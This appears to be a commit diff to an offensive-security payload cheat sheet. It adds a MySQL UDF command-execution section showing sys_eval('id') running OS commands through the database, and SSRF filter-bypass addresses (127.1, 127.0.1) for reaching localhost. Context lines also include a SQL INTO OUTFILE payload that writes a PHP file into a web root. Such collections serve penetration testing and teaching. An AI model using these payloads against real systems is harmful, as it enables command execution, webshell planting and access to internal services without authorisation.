MSQL UDF sys_exec + SSRF IP: 127.1 and 127.0.1

SQL Injection/MySQL Injection.md

@@ -21,6 +21,7 @@
 * [MYSQL DIOS - Dump in One Shot](#mysql-dios---dump-in-one-shot)
 * [MYSQL Read content of a file](#mysql-read-content-of-a-file)
 * [MYSQL Write a shell](#mysql-write-a-shell)
+* [MYSQL UDF command execution](#mysql-udf-command-execution)
 * [MYSQL Truncation](#mysql-truncation)
 * [MYSQL Out of band](#mysql-out-of-band)
     * [DNS exfiltration](#dns-exfiltration)
@@ -250,6 +251,29 @@ SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php phpinfo
 
 In MYSQL "`admin `" and "`admin`" are the same. If the username column in the database has a character-limit the rest of the characters are truncated. So if the database has a column-limit of 20 characters and we input a string with 21 characters the last 1 character will be removed.
 
+## MYSQL UDF command execution
+
+First you need to check if the UDF are installed on the server.
+
+```powershell
+$ whereis lib_mysqludf_sys.so
+/usr/lib/lib_mysqludf_sys.so
+```
+
+Then you can use functions such as `sys_exec` and `sys_eval`.
+
+```sql
+$ mysql -u root -p mysql
+Enter password: [...]
+mysql> SELECT sys_eval('id');
++--------------------------------------------------+
+| sys_eval('id') |
++--------------------------------------------------+
+| uid=118(mysql) gid=128(mysql) groups=128(mysql) |
++--------------------------------------------------+
+```
+
+
 ## MYSQL Out of band
 
 ```powershell

Server Side Request Forgery/README.md

@@ -136,10 +136,12 @@ localhost:+11211aaa
 localhost:00011211aaaa
 ```
 
-Bypass using rare address
+Bypass using rare address, you can short-hand IP addresses by dropping the zeros
 
 ```powershell
 http://0/
+http://127.1
+http://127.0.1
 ```
 
 Bypass using bash variables (curl only)